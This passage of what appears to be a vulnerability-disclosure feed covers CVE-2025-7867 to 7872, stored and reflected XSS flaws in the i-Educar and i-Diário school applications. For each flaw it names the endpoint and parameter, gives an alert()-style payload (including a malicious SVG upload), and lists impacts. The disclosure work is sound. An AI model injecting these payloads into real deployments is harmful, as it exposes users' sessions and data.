class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB i-Educar PaCXXX'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7867/image.png" width="1901" height="986" srcset="/p/cve-2025-7867/image_hu_9177192a4933535d.png 480w, /p/cve-2025-7867/image_hu_1214bd40f85ed40c.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="192" data-flex-basis="462px" /></p> <p><img src="/p/cve-2025-7867/image-1.png" width="1896" height="898" srcset="/p/cve-2025-7867/image-1_hu_bad03e95b8b5cbe1.png 480w, /p/cve-2025-7867/image-1_hu_639a842d81b9b092.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="211" data-flex-basis="506px" /></p> <h3 id="video-poc">Video PoC: </h3><p><a class="link" href="https://youtu.be/dOwcn_k2iTE" target="_blank" rel="noopener" >https://youtu.be/dOwcn_k2iTE</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7867.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7867.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 20 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-7868/ https://www.cvehunters.com/p/cve-2025-7868/ <h2 id="cve-2025-7868-cross-site-scripting-xss-stored-endpoint-educar_calendario_dia_motivo_cadphp-parameter-cod_calendario_dia_motivo">CVE-2025-7868: Cross-Site Scripting (XSS) Stored endpoint <code>educar_calendario_dia_motivo_cad.php</code> parameter <code>cod_calendario_dia_motivo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7868" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7868</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_calendario_dia_motivo_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>cod_calendario_dia_motivo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_calendario_dia_motivo_cad.php</code></p><h2 id="cve-2025-7868-cross-site-scripting-xss-stored-endpoint-educar_calendario_dia_motivo_cadphp-parameter-cod_calendario_dia_motivo">CVE-2025-7868: Cross-Site Scripting (XSS) Stored endpoint <code>educar_calendario_dia_motivo_cad.php</code> parameter <code>cod_calendario_dia_motivo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7868" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7868</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_calendario_dia_motivo_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>cod_calendario_dia_motivo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_calendario_dia_motivo_cad.php</code></p> <p>Parameter: <code>cod_calendario_dia_motivo</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>cod_calendario_dia_motivo</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB i-Educar PaCXXX'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7868/image-1.png" width="1895" height="984" srcset="/p/cve-2025-7868/image-1_hu_97d38405728c544.png 480w, /p/cve-2025-7868/image-1_hu_3a6a150e1d9596b7.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="192" data-flex-basis="462px" /></p> <p><img src="/p/cve-2025-7868/image.png" width="1908" height="969" srcset="/p/cve-2025-7868/image_hu_a173bc0dd1ee021a.png 480w, /p/cve-2025-7868/image_hu_61aa51eb4a1fba4a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="196" data-flex-basis="472px" /></p> <h3 id="video-poc">Video PoC: </h3><p><a class="link" href="https://youtu.be/RtXMxNLuAx8" target="_blank" rel="noopener" >https://youtu.be/RtXMxNLuAx8</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7868.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7868.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 20 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-7869/ https://www.cvehunters.com/p/cve-2025-7869/ <h2 id="cve-2025-7869-cross-site-scripting-xss-stored-endpoint-educar_turma_tipo_detphp-parameter-cod_turma_tipo">CVE-2025-7869: Cross-Site Scripting (XSS) Stored endpoint <code>educar_turma_tipo_det.php</code> parameter <code>cod_turma_tipo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7869" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7869</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_turma_tipo_det.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>cod_turma_tipo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_turma_tipo_det.php</code></p><h2 id="cve-2025-7869-cross-site-scripting-xss-stored-endpoint-educar_turma_tipo_detphp-parameter-cod_turma_tipo">CVE-2025-7869: Cross-Site Scripting (XSS) Stored endpoint <code>educar_turma_tipo_det.php</code> parameter <code>cod_turma_tipo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7869" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7869</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_turma_tipo_det.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>cod_turma_tipo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_turma_tipo_det.php</code></p> <p>Parameter: <code>cod_turma_tipo</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>cod_turma_tipo</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB i-Educar PaCXXX'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7869/image.png" width="1869" height="982" srcset="/p/cve-2025-7869/image_hu_a2589e8ed4337362.png 480w, /p/cve-2025-7869/image_hu_17deafef38d887a2.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="190" data-flex-basis="456px" /></p> <p><img src="/p/cve-2025-7869/image-1.png" width="1908" height="961" srcset="/p/cve-2025-7869/image-1_hu_fab2a14a1c166956.png 480w, /p/cve-2025-7869/image-1_hu_8f2641744613856f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="198" data-flex-basis="476px" /></p> <h3 id="video-poc">Video PoC: </h3><p><a class="link" href="https://youtu.be/RtXMxNLuAx8" target="_blank" rel="noopener" >https://youtu.be/RtXMxNLuAx8</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7869.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7869.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 20 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-7870/ https://www.cvehunters.com/p/cve-2025-7870/ <h2 id="cve-2025-7870-cross-site-scripting-xss-storage-injection-via-svg-upload">CVE-2025-7870: Cross-Site Scripting (XSS) Storage Injection via SVG Upload </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7870" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7870</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">An attacker can upload a malicious SVG file containing embedded JavaScript that is executed when the file is accessed directly. This results in Stored Cross-Site Scripting (XSS).</p> <h2 id="details">Details </h2><p style="text-align: justify;">The <code>justificativas-de-falta</code> endpoint allows users to upload files after upload a crafted svg the XSS could be trigger when open the file.</p> <h2 id="payload">Payload: </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">svg</span> <span class="na">xmlns</span><span class="o">=</span><span class="s">"http://www.w3.org/2000/svg"</span> <span class="na">fill</span><span class="o">=</span><span class="s">"none"</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="nx">alert</span><span class="p">(</span><span class="s2">"This is an XSS-POC from CVEHUNTERS"</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p"></</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"><span class="p"></</span><span class="nt">svg</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="poc">PoC </h2><p style="text-align: justify;">Create the file with the payload and upload in the <code>justificativas-de-falta</code> endpoint:</p><h2 id="cve-2025-7870-cross-site-scripting-xss-storage-injection-via-svg-upload">CVE-2025-7870: Cross-Site Scripting (XSS) Storage Injection via SVG Upload </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7870" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7870</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">An attacker can upload a malicious SVG file containing embedded JavaScript that is executed when the file is accessed directly. This results in Stored Cross-Site Scripting (XSS).</p> <h2 id="details">Details </h2><p style="text-align: justify;">The <code>justificativas-de-falta</code> endpoint allows users to upload files after upload a crafted svg the XSS could be trigger when open the file.</p> <h2 id="payload">Payload: </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">svg</span> <span class="na">xmlns</span><span class="o">=</span><span class="s">"http://www.w3.org/2000/svg"</span> <span class="na">fill</span><span class="o">=</span><span class="s">"none"</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="nx">alert</span><span class="p">(</span><span class="s2">"This is an XSS-POC from CVEHUNTERS"</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p"></</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"><span class="p"></</span><span class="nt">svg</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="poc">PoC </h2><p style="text-align: justify;">Create the file with the payload and upload in the <code>justificativas-de-falta</code> endpoint:</p> <p><img src="/p/cve-2025-7870/image.png" width="1015" height="489" srcset="/p/cve-2025-7870/image_hu_97f480d64265cd01.png 480w, /p/cve-2025-7870/image_hu_716aaa27c91d8c32.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="207" data-flex-basis="498px" /></p> <p style="text-align: justify;">After that open the file to trigger the XSS</p> <p><img src="/p/cve-2025-7870/image-1.png" width="1014" height="554" srcset="/p/cve-2025-7870/image-1_hu_f8cd9eca2b7a1c6.png 480w, /p/cve-2025-7870/image-1_hu_8545ee9302fe0aef.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="183" data-flex-basis="439px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7870.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7870.md</a></p> <h2 id="finder">Finder: </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 20 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-7871/ https://www.cvehunters.com/p/cve-2025-7871/ <h2 id="cve-2025-7871-cross-site-scripting-xss-reflected-endpoint-conteudos-parameter-filterby_description">CVE-2025-7871: Cross-Site Scripting (XSS) Reflected endpoint <code>conteudos</code> parameter <code>filter[by_description]</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7871" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7871</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>conteudos</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>filter[by_description]</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>conteudos</code></p> <p>Parameter: <code>filter[by_description]</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">img</span> <span class="nx">src</span><span class="o">=</span><span class="nx">x</span> <span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7871/image.png" width="1068" height="456" srcset="/p/cve-2025-7871/image_hu_2d1d25c318923651.png 480w, /p/cve-2025-7871/image_hu_b7c29b14bea54e56.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="234" data-flex-basis="562px" ></p> <p><img src="/p/cve-2025-7871/image-1.png" width="1782" height="1042" srcset="/p/cve-2025-7871/image-1_hu_4b4784dcf11d21e5.png 480w, /p/cve-2025-7871/image-1_hu_d1ea07eeaf8e7cc2.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="171" data-flex-basis="410px" ></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p><h2 id="cve-2025-7871-cross-site-scripting-xss-reflected-endpoint-conteudos-parameter-filterby_description">CVE-2025-7871: Cross-Site Scripting (XSS) Reflected endpoint <code>conteudos</code> parameter <code>filter[by_description]</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7871" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7871</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>conteudos</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>filter[by_description]</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>conteudos</code></p> <p>Parameter: <code>filter[by_description]</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">img</span> <span class="nx">src</span><span class="o">=</span><span class="nx">x</span> <span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7871/image.png" width="1068" height="456" srcset="/p/cve-2025-7871/image_hu_2d1d25c318923651.png 480w, /p/cve-2025-7871/image_hu_b7c29b14bea54e56.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="234" data-flex-basis="562px" /></p> <p><img src="/p/cve-2025-7871/image-1.png" width="1782" height="1042" srcset="/p/cve-2025-7871/image-1_hu_4b4784dcf11d21e5.png 480w, /p/cve-2025-7871/image-1_hu_d1ea07eeaf8e7cc2.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="171" data-flex-basis="410px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7871.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7871.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 20 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-7872/ https://www.cvehunters.com/p/cve-2025-7872/ <h2 id="cve-2025-7872-cross-site-scripting-xss-stored-endpoint-justificativas-de-falta-parameter-justificativa">CVE-2025-7872: Cross-Site Scripting (XSS) Stored endpoint <code>justificativas-de-falta</code> parameter <code>Justificativa</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7872" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7872</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>justificativas-de-falta</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>Justificativa</code>parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>justificativas-de-falta</code></p><h2 id="cve-2025-7872-cross-site-scripting-xss-stored-endpoint-justificativas-de-falta-parameter-justificativa">CVE-2025-7872: Cross-Site Scripting (XSS) Stored endpoint <code>justificativas-de-falta</code> parameter <code>Justificativa</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7872" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7872</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>justificativas-de-falta</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>Justificativa</code>parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>justificativas-de-falta</code></p> <p>Parameter: <code>Justificativa</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Justificativa</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">img</span> <span class="nx">src</span><span class="o">=</span><span class="nx">x</span> <span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC3'</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7872/image.png" width="972" height="892" srcset="/p/cve-2025-7872/image_hu_b4847f334cbf63a8.png 480w, /p/cve-2025-7872/image_hu_711c4335047c53ed.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="108" data-flex-basis="261px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7872.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7872.md</a></p> <h2 id="finder">Finder: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 20 Jul 2025 00:00:00 +0000 